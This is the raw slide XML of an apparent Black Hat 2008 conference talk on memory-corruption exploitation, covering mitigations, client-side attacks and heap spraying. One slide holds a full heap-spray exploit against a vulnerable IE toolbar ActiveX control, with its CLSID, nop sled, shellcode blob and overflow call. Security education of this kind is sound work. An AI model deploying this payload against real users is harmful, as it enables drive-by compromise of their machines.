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90" r:id="rId4"/>
    <p:sldId id="291" r:id="rId5"/>
    <p:sldId id="292" r:id="rId6"/>
    <p:sldId id="293" r:id="rId7"/>
    <p:sldId id="294" r:id="rId8"/>
    <p:sldId id="297" r:id="rId9"/>
    <p:sldId id="295" r:id="rId10"/>
    <p:sldId id="298" r:id="rId11"/>
    <p:sldId id="296" r:id="rId12"/>
    <p:sldId id="29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7/17/2008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Exploitation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685032"/>
            <a:ext cx="8763000" cy="1801368"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Jared DeMott</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Crucial Security, Inc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Black Hat 2008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791200"/>
            <a:ext cx="8183880" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>More on heap staging for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>MacB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638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idea is to make the heap predictable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Done in the following manner:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 1000 buffers of size 4000</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Now we’re sure the next 4000 byte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> will be right after these.  I.e. there will be no “holes” or fragments in unpredictable positions that will be used for the next memory request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Free every other 1 of last 100 allocations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Now when the vulnerable code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>alloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is made it will end up in one of these (our) holes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>At attack time, the overflow will pour into one of the buffers we control (since they are adjacent).  This is done to ensure the presence of a function pointer specific to this app.  This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> gets called, which points back to user supplied SC.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>But how do we know what value to make the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Spraying.  A good guess based on heap layout.  Sled/SC is in each </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>malloc’ed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> buffer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have saved </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>MacB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/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>As with spraying:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ASLR would not have helped since no references to a library/binary was made</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>NX stack and/or stack canaries wouldn’t help since it’s not a stack attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(OSX doesn’t have the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SafeSEH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> notion)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>However,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A Nonexecutable heap would have prevented this version of the attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Also randomized heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>alloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>()s could have also prevented the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>attack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85216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48"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The two biggest and general threats to information security in 2008 are:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>0day to the desktop (client-sides)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Effective </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rootkits</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Some even being memory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>only</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>However,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="502920" lvl="2" indent="-265176">
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Once </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>all the protections of Vista are in full use … exploitation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(particularly of memory corruption bugs) is made more difficult</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="502920" lvl="2" indent="-265176">
              <a:buSzPct val="80000"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacks may have to become more targeted/custom, or leverage more old school techniques like social engineering, design flaws in web apps, etc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" y="5715000"/>
            <a:ext cx="8183880" cy="670560"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Previously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Traditional Stack Overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Function pointer Overwrite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Traditional Heap Overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Off-by-ones</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Format String Exceptions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Newer Stack Overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Return to libc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SEH overwrite</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Uninitialized variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Stack or heap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Integer Errors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Conversions or overflows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Summary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00800" y="914400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51549" y="4126468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3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613349" y="1905000"/>
            <a:ext cx="7620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2221468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2</a:t>
            </a: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>
            <a:off x="5638800" y="3200400"/>
            <a:ext cx="762000" cy="2209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>
            <a:off x="5562600" y="685800"/>
            <a:ext cx="7620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501640"/>
            <a:ext cx="8183880" cy="1051560"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Modern Protections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381000"/>
            <a:ext cx="8183880" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Many of those classic attacks are much more difficult or impossible to land…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Content Placeholder 3" descr="Figure_2_9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371600"/>
            <a:ext cx="8534400" cy="45539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1905000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XPSP2/3 for some as well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face of adversity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512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Yet, exploitation continues</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>CanSecWest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> 2008</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>MacBook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Air running OSX 10.5.2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Defeated by Charlie Miller &amp; gang of ISE  ($10K prize + laptop)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Fujitsu U810 running Vista Ultimate SP1 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Defeated by Shane Macaulay and Alexander </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Sotirov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ($5k prize + laptop)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Both went down via client side attacks (Safari and flash respectively)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>How did these attacks work?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>How were they able to succeed in the face of such adversity (security)?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side bugs … we love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560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First a bit on client side bugs:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Traditional attacks were actively launched against servers at any time by the hacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>However, with new protections and the increased security awareness of server software development, bugs in servers are nearly gone in major vendor software</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Thus the “client” or end user has become the target of 2008</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>By persuading a client to browse a malicious site, feature rich (bloated) software like Internet Explorer (IE), Firefox, Safari (all which include things like flash player and  JavaScript) are under heavy attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exploitation involves servers hosting the malicious code poised ready to exploit incoming clients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Example: LinkedIn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988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already classic example of such an attack would be a SEH overwrite with heap spray</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Performed against a vulnerable IE plugin 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javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and the weak COM object</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>One example of many was a 2007 exploit release against the LinkedIn (IE) toolbar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Buffer overflow in COM function named search()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Discovered with a fuzzing tool called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>COMRadier</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Code on next slide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534400" cy="7239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&lt;html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>classid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>='clsid:0F2437D6-C4E4-42CA-A906-F506E09354B7' id='target'&gt;&lt;/object&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;script language='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>'&gt;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function repeat(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>n,c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)    {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retval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>="";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	for (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=0;i&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>n;i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>++)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>retval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>retval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> + c;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>retval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>;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//EAX contains this value.  call [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>].  that lands us on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nops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blind_jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = repeat(50000,unescape("%u0a0a%u0a0a"));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//shellcode:  From metasploit.com. SC can be very big if you want.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>   shellcode = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" err="1" smtClean="0"/>
              <a:t>unescape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>("%uc931%ue983%ud9dd%ud9ee%u2474%u5bf4%u7381%ub213%u28cd%u837b%ufceb%uf4e2%u254e%u7b6c%ucdb2%u3ea3%u468e%u7e54%uccca%uf0c7%ud5fd%u24a3%ucc92%u32c3%uf939%u7aa3%ufc5c%ue2e8%u491e%u0fe8%u0cb5%u76e2%u0fb3%u8fc3%u9989%u7f0c%u28c7%u24a3%ucc96%u1dc3%uc139%uf063%ud1ed%u9029%ud139%u7aa3%u4459%u5f74%u0eb6%ubb19%u46d6%u4b68%u0d37%u7750%u8d39%uf024%ud1c2%uf085%uc5da%u72c3%u4d39%u7b98%ucdb2%u13a3%u928e%u8d19%u9bd2%u83a1%u0d31%u2b53%ub3da%u99f0%ua5c1%u85b0%uc338%u847f%uae55%u1749%ue3d1%u034d%ucdd7%u7b28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//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nops</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> are executable and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>deref</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to the same spot.  I.e. call[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>] or </a:t>
            </a:r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 smtClean="0"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>]. OK.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nops</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = repeat(3925, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>unescape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>("%u0a0a%u0a0a") );</a:t>
            </a:r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mem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = new Array();  //This where the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>heapspray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> comes into play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for(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>=0; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>&lt;9000; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>++)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>   {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/>
              <a:t>mem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>] = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>nops+shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>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err="1" smtClean="0"/>
              <a:t>target.search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>(“nothing", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>blind_jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>overflow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> occurs here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&lt;/script&gt;&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pP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2895600" y="1219200"/>
            <a:ext cx="762000" cy="152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57600" y="990600"/>
            <a:ext cx="220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Builds long string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5181601" y="1600200"/>
            <a:ext cx="845153" cy="533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26753" y="1371600"/>
            <a:ext cx="220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Return addr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6404277" y="2587323"/>
            <a:ext cx="533401" cy="38795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64953" y="2285999"/>
            <a:ext cx="220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Pop up calc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352801" y="5410200"/>
            <a:ext cx="762000" cy="152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14801" y="5181600"/>
            <a:ext cx="220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Builds long string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6248401" y="6172198"/>
            <a:ext cx="845153" cy="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93553" y="5943598"/>
            <a:ext cx="1821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Call vulnerable function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0800000" flipV="1">
            <a:off x="5029201" y="152400"/>
            <a:ext cx="845153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74353" y="-76200"/>
            <a:ext cx="220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ID of weak class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6" grpId="0"/>
      <p:bldP spid="18" grpId="0"/>
      <p:bldP spid="21" grpId="0"/>
      <p:bldP spid="2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775960"/>
            <a:ext cx="8183880" cy="777240"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Thoughts on spraying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454152"/>
            <a:ext cx="8183880" cy="52608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Not considered a sexy attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Slow attack as it must allocate large amounts of memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Occasionally requires the target to have &gt;1gb of RAM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Depends on some amount of luck and is not always 100% reliable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Easy to do, however, and defeats the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Stack Canaries (/GS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Since the exception handling is post /GS check, and we’re hijacking an exception handler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ASLR (Vista only)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Don’t reference </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>libs</a:t>
            </a:r>
            <a:r>
